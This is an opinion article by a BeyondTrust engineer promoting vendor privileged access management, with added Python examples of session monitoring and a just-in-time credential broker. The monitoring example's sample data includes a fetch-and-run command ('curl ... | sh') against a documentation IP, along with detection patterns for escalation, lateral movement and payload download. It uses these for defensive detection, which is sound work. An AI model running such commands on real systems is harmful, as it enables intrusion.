Posted in Opinion

How to address vendor-access risks in the Middle East

Willful or ignorant misuse by third parties can introduce risk. And that risk may not always be apparent

Layale Hachem is a senior solutions engineer at BeyondTrust

Our conversations with other companies about security often turn into a series of cautionary case studies. In many of them, the common thread is a supply-chain attack: the compromise did not start inside the victim's own perimeter but came in through a third party that had been granted access.

Supply-chain attacks pose such a headache for CISOs because they originate outside the organisation's own domain, with third parties. Consultants, contractors, and vendors dip in and out of their clients' digital estates over remote connections. Such activity is routine and frequent, and it often lacks the visibility security teams need to retain control. For example, a vendor connecting over a VPN (virtual private network) typically lands a device the client does not manage on the client's network, with whatever reachability the tunnel allows, so the client's own access policies are bypassed rather than enforced.

Willful or ignorant misuse by third parties can introduce risk. And that risk may not always be apparent. In a recent PwC survey, less than half of security leaders in the United Arab Emirates (UAE) said they had a good understanding of the risks posed to their organisation by vendors. And the complexities of post-Covid technology stacks may exacerbate this visibility problem. When not bound by policy, credentials may be weak. Access may be shared. Passwords may be reused. And former employees of the vendor may misuse orphaned accounts.

The way forward: VPAM

How, then, should we manage vendor access, given that vendors may be the weakest link in the security chain? Privileged access for third parties may be necessary to the smooth running of the business, but that should not require security leaders to make exceptions to policy. The solution is vendor privileged access management (VPAM), which lets third parties connect to the corporate environment while subjecting them to the same privileged access management (PAM) practices that are applied to internal staff.

VPAM extends the technologies found in privileged access management (PAM) and unifies them with secure remote access and zero trust. Delivered as a cloud service, it can broker privileged remote access to wherever the client organisation has assets (platforms, infrastructure, or applications) that require vendor support. VPAM solutions are designed to assume weaker security on the vendor side and to protect against account compromise, lateral movement, privilege escalation, and payload delivery. Least privilege, continuous authentication, and many other requirements of a zero-trust architecture (ZTA) are also built in.

VPAM allows implementation of many identity-management best practices. The five main ones follow.

Visibility

VPAM enables organisations to maintain a live inventory of vendors, onboard new ones quickly, and account for all access to systems. Each vendor session is monitored as it is instantiated, and every action, from keystrokes to commands entered, is recorded and indexed for searching. The result is an archive that monitoring tools can query to help identify compromise of a vendor's credentials. Where risk is discovered, VPAM allows additional layers of security to be imposed on the affected account or, where necessary, its access to be revoked.

Control

For all inbound access, VPAM monitors and logs authentication, and has full visibility into all transactions that take place within authorised sessions. This gives back control of third-party access to organisations and allows them to have greater insight of the entire risk tree, from root to branch.
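The visibility and control sections above describe recording every command in a vendor session, indexing it for search, and spotting sessions that warrant review. The following is an added illustration of that idea, not BeyondTrust's code or any product's API: the session records are constructed sample data, and the review rules (privilege escalation, lateral movement, piped payload download, activity outside an agreed support window) are hypothetical examples of what a security team might tune for its own estate.

```python
"""Index recorded vendor-session commands and flag sessions that need review.

Added example, not BeyondTrust code. SAMPLE_EVENTS is constructed data shaped like
what a session recorder might emit (one row per command); REVIEW_RULES are
hypothetical patterns a reviewer might look for.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class SessionEvent:
    session_id: str
    vendor: str
    timestamp: str   # ISO 8601 UTC, constructed
    host: str
    command: str


# Constructed sample: two routine sessions and one that escalates, hops hosts and
# pulls a script from an external address out of hours.
SAMPLE_EVENTS = [
    SessionEvent("s-1001", "acme-support", "2024-05-02T09:01:10Z", "erp-db-01", "tail -n 100 /var/log/app.log"),
    SessionEvent("s-1001", "acme-support", "2024-05-02T09:03:42Z", "erp-db-01", "systemctl status erp"),
    SessionEvent("s-1002", "acme-support", "2024-05-02T21:15:05Z", "erp-db-01", "sudo su -"),
    SessionEvent("s-1002", "acme-support", "2024-05-02T21:16:30Z", "erp-db-01", "ssh admin@hr-app-02"),
    SessionEvent("s-1002", "acme-support", "2024-05-02T21:17:02Z", "hr-app-02", "curl http://198.51.100.7/x.sh | sh"),
    SessionEvent("s-1003", "globex-hvac", "2024-05-03T10:00:00Z", "bms-ctl-01", "cat /etc/bms/config.yaml"),
]

# Hypothetical review rules: label -> regex over a single recorded command line.
REVIEW_RULES = {
    "privilege_escalation": re.compile(r"^\s*sudo\s+(su|-i|-s)\b"),
    "lateral_movement": re.compile(r"^\s*(ssh|scp|psexec|wmic)\b"),
    "payload_download": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"),
}


def build_index(events):
    """Index events by session id and by whitespace-separated command token."""
    by_session = defaultdict(list)
    by_token = defaultdict(set)
    for ev in events:
        by_session[ev.session_id].append(ev)
        for tok in set(ev.command.split()):
            by_token[tok].add(ev.session_id)
    return by_session, by_token


def search(by_token, term):
    """Sorted session ids whose recorded commands contain `term` as a token."""
    return sorted(by_token.get(term, ()))


def flag_sessions(by_session):
    """{session_id: sorted rule labels} for every session that matches at least one rule."""
    flagged = {}
    for sid, evs in by_session.items():
        labels = sorted({label for ev in evs
                         for label, rx in REVIEW_RULES.items() if rx.search(ev.command)})
        if labels:
            flagged[sid] = labels
    return flagged


def sessions_outside_hours(by_session, start_hour=7, end_hour=19):
    """Sessions with any command outside the agreed support window (UTC hours; constructed policy)."""
    out = set()
    for sid, evs in by_session.items():
        for ev in evs:
            hour = int(ev.timestamp[11:13])
            if not start_hour <= hour < end_hour:
                out.add(sid)
    return sorted(out)


if __name__ == "__main__":
    by_session, by_token = build_index(SAMPLE_EVENTS)
    print("sessions that ran ssh:", search(by_token, "ssh"))
    print("flagged:", flag_sessions(by_session))
    print("out of hours:", sessions_outside_hours(by_session))
```

Session s-1002 is the only one flagged, on all three rules plus the out-of-hours check; that combination is what a security team would isolate for locking or termination. In a real deployment the index would be a search backend rather than in-memory dictionaries, and the rules would be tuned to the commands the vendor is actually contracted to run.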

Credential management

VPAM recognises the inherent risk of handing vendors a password and letting them connect directly. Instead, the platform injects a managed credential into the remote session at connection time. The third-party user never sees that credential, and the security team controls what happens to it afterwards: it can be kept for reuse or rotated after every session, depending on the sensitivity of the access it grants.

Multi-factor authentication (MFA)

While imperfect as a security catch-all, multi-factor authentication still constitutes a best practice for remote access. MFA is an effective safeguard against reuse of a stolen password, and its presence in VPAM is standard. The caveat is that weaker factors (SMS codes, push approvals) can be phished or worn down by repeated prompts, so phishing-resistant factors should be preferred for privileged vendor access, and MFA should be treated as one layer alongside session monitoring rather than a substitute for it.

Least privilege

The best practice of granting only the privileges required to do a job (and no more) is integral to PAM and VPAM. Provisioning third-party access this way, coupled with just-in-time (JIT) access, where rights are granted only when work is to be carried out and withdrawn when it is completed or shortly thereafter, results in a state of zero standing privileges (ZSP): outside an approved task there is no account, password or permission for an attacker to steal.
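The credential-management and least-privilege sections above describe three mechanisms working together: a time-bounded just-in-time grant, a managed credential injected by the broker rather than handed to the vendor, and rotation of that credential when the session ends. The following added example models that flow in a small in-memory broker. It is an illustration written for this article, not BeyondTrust's code or any product's API; the `Broker` class, its in-memory vault, the ticket reference and the fake session handle are all hypothetical stand-ins for a real PAM backend and RDP/SSH proxy.

```python
"""Minimal vendor-access broker: JIT grants, credential injection, rotation on close.

Added example, not BeyondTrust code. Everything here (Broker, vault, ticket ids,
the _connect() stand-in) is hypothetical. The property it demonstrates: the vendor
only ever receives a grant id and a session handle, never the account's secret,
and no usable credential exists before the grant or after the session.
"""
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


class AccessDenied(Exception):
    pass


@dataclass
class Grant:
    grant_id: str
    vendor: str
    target: str
    account: str
    expires_at: float
    ticket: str          # change/ticket reference justifying the access (constructed)
    used: bool = False   # single-use: a second session needs a new grant


@dataclass
class Broker:
    vault: Dict[str, Dict[str, str]] = field(default_factory=dict)   # target -> account -> secret
    grants: Dict[str, Grant] = field(default_factory=dict)
    audit: List[tuple] = field(default_factory=list)
    clock: Callable[[], float] = time.time   # injectable for deterministic tests

    def enrol_account(self, target, account):
        """Register a managed account; the secret is generated and held server-side."""
        self.vault.setdefault(target, {})[account] = secrets.token_urlsafe(24)

    def request_access(self, vendor, target, account, ticket, ttl_seconds=900):
        """Issue a time-bounded grant. Nothing exists for the vendor before this call."""
        if account not in self.vault.get(target, {}):
            raise AccessDenied(f"no managed account {account!r} on {target!r}")
        g = Grant(secrets.token_hex(8), vendor, target, account,
                  self.clock() + ttl_seconds, ticket)
        self.grants[g.grant_id] = g
        self.audit.append(("grant", vendor, target, account, ticket))
        return g.grant_id

    def open_session(self, grant_id):
        """Inject the managed credential into a session; return only a session handle."""
        g = self.grants.get(grant_id)
        if g is None or g.used or self.clock() >= g.expires_at:
            raise AccessDenied("grant missing, expired or already consumed")
        g.used = True
        secret = self.vault[g.target][g.account]
        handle = self._connect(g.target, g.account, secret)   # secret never leaves the broker
        self.audit.append(("session_open", g.vendor, g.target, g.account, handle))
        return handle

    def close_session(self, grant_id, handle):
        """End the session and rotate the credential so nothing captured stays valid."""
        g = self.grants.pop(grant_id, None)
        if g is None:
            raise AccessDenied("unknown grant")
        old = self.vault[g.target][g.account]
        self.vault[g.target][g.account] = secrets.token_urlsafe(24)
        self.audit.append(("rotate", g.vendor, g.target, g.account, handle))
        return old != self.vault[g.target][g.account]

    def _connect(self, target, account, secret):
        # Stand-in for the broker itself opening an RDP/SSH connection with `secret`.
        return f"sess-{secrets.token_hex(4)}"


def try_open(broker, grant_id) -> Optional[str]:
    """Helper for callers: a handle if the grant is usable, None if access is denied."""
    try:
        return broker.open_session(grant_id)
    except AccessDenied:
        return None


def run_vendor_task(clock=time.time):
    """Worked flow: enrol account, grant for a ticket, open, close, rotate."""
    b = Broker(clock=clock)
    b.enrol_account("erp-db-01", "svc_vendor")
    gid = b.request_access("acme-support", "erp-db-01", "svc_vendor", "CHG-4412", ttl_seconds=600)
    handle = b.open_session(gid)
    rotated = b.close_session(gid, handle)
    return b, gid, handle, rotated


if __name__ == "__main__":
    broker, gid, handle, rotated = run_vendor_task()
    print("session handle issued to vendor:", handle)
    print("credential rotated on close:", rotated)
    print("grant still usable after close:", try_open(broker, gid) is not None)
```

Two details carry the security argument. The grant is single-use and clock-bounded, so a leaked grant id is worthless after the session or after the TTL; and the vault is only ever read inside `open_session`, so even full session recording (keystrokes included) never captures a reusable secret, because the value is rotated the moment the session closes.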

The ideal platform

For regional organisations looking to become digital businesses, privileged remote access is likely unavoidable. But what is needed to remain protected from threat actors is a holistic set of VPAM capabilities that secure vendor identities and remote access. Such a platform will be necessary for regional stakeholders to ensure compliance with an array of government regulations and industry standards.

At the very least, the VPAM solution should secure remote connections and network access without requiring firewall changes; in practice this means the client side reaches out to the broker over an outbound connection, so no inbound port has to be opened for vendors. It should allow control granular enough for the enterprise to define permissions for every session, and it should proxy access to RDP, SSH, cloud instances, and Windows, Unix, and Linux applications, so that the vendor reaches the target only through the broker and never directly.

Password management and built-in MFA should be present, along with the ability to inject hidden credentials directly into remote-access sessions. Passwords and SSH keys should be rotated regularly, and least privilege should combine with JIT provisioning to add further layers of safety. Every session activity should be recorded, and the record should be searchable and complete enough to support thorough auditing and forensics. Finally, the VPAM platform should let security teams spot suspicious sessions easily and isolate them for further action, whether that is locking or termination.

Vendors are a way of life. And vendors hopping in and out of client networks is likely a permanent fixture of digital life, certainly in the B2B space. We must adapt, and VPAM allows us to do that without appreciable compromise to business operations, vendor agility or security. For that reason alone, it is the future of identity management.
